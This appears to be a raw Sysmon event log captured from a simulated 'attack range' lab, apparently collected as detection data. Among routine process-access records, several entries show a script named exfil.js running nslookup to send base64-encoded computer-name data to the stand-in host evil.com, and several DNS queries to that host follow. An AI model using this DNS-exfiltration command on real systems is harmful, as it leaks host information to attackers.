14:16:10.557{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.557{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.557{2E1864BB-17AA-629A-393E-000000005F02}66807592C:\Windows\system32\cmd.exe{2E1864BB-17AA-629A-3B3E-000000005F02}5824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.557{2E1864BB-17AA-629A-3B3E-000000005F02}5824C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AA-629A-393E-000000005F02}6680C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrksg.tmp 2>&1 23542300x8000000000000000195361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.541{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=138ABA13C4335A102347FAE69C1F31FB,SHA256=DB2D9FAA0B804AE1BE14E3B518B15D02BC00024ECED02F2ADD528AD8E74A2C5B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.526{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-3A3E-000000005F02}6672C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.526{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AA-629A-3A3E-000000005F02}6672C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.526{2E1864BB-17AA-629A-3A3E-000000005F02}66727336C:\Windows\system32\conhost.exe{2E1864BB-17AA-629A-393E-000000005F02}6680C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.510{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-3A3E-000000005F02}6672C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.509{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.509{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.509{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.508{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.508{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AA-629A-393E-000000005F02}6680C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.507{2E1864BB-17A1-629A-783D-000000005F02}55521152C:\Windows\System32\WScript.exe{2E1864BB-17AA-629A-393E-000000005F02}6680C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.507{2E1864BB-17AA-629A-393E-000000005F02}6680C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrksg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 22542200x8000000000000000195349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.535{00000000-0000-0000-0000-000000000000}1788evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.431{00000000-0000-0000-0000-000000000000}2600evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.352{00000000-0000-0000-0000-000000000000}3732evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.229{00000000-0000-0000-0000-000000000000}7804evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.086{00000000-0000-0000-0000-000000000000}7288evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.998{00000000-0000-0000-0000-000000000000}8016evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.905{00000000-0000-0000-0000-000000000000}7316evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.793{00000000-0000-0000-0000-000000000000}4672evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.696{00000000-0000-0000-0000-000000000000}7996evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.575{00000000-0000-0000-0000-000000000000}7528evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.494{00000000-0000-0000-0000-000000000000}8040evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000195338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.488{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.488{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.488{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.488{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.488{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.488{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.488{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.488{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043913Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:10.807{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C4A8B92D6C772A9BE87EBA09ECFF6DA,SHA256=D297DEE211B3052A84EFD9A9689B979E9BFDA977CDA84E8D3C60A4FE24E0A9D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.488{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 